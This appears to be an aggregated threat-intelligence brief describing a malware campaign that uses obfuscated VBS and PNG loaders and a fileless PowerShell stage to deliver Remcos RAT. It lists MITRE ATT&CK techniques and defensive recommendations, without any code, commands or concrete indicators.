Multi-Stage Malware Campaign Utilizing Obfuscated VBS and PNG Loaders

Severity: High (Score: 72.6)

Sources: Cybersecuritynews, Socprime, Gbhackers

Summary

A sophisticated multi-stage malware campaign has been identified, leveraging Unicode-obfuscated Visual Basic Script (VBS) loaders and PNG files to execute malicious payloads. The campaign employs a fileless PowerShell loader and can deliver various payloads, including Remcos RAT and UAC bypass DLLs. The threat actor hosts the malware toolkit in openly accessible directories under a .xyz domain and Cloudflare-backed subdomains, facilitating rapid payload changes. Initial detection occurred through LevelBlue’s MDR SOC, which quarantined the VBS artifact and uncovered a Base64-encoded PowerShell command that downloaded PNG files containing embedded .NET assemblies. The campaign targets systems without leaving traces on disk, posing a significant risk to organizations. Recommended defenses include restricting execution of high-risk script types and monitoring for suspicious in-memory .NET loading. The current status indicates ongoing activity, necessitating immediate defensive measures. Key Points: • The campaign uses obfuscated VBS and PNG files to deliver malicious payloads. • LevelBlue’s MDR SOC detected the initial malware, revealing a sophisticated infrastructure. • Defenders are advised to restrict execution of high-risk scripts and monitor for in-memory threats.

Key Entities

• Malware (attack_type)
• Open Directory Malware Campaign (campaign)
• Remcos RAT (malware)
• T1053 - Scheduled Task/Job (mitre_attack)
• T1059.001 - PowerShell (mitre_attack)
• T1059.005 - Visual Basic (mitre_attack)
• T1105 - Ingress Tool Transfer (mitre_attack)
• Windows (platform)
• PowerShell (tool)
• Python (tool)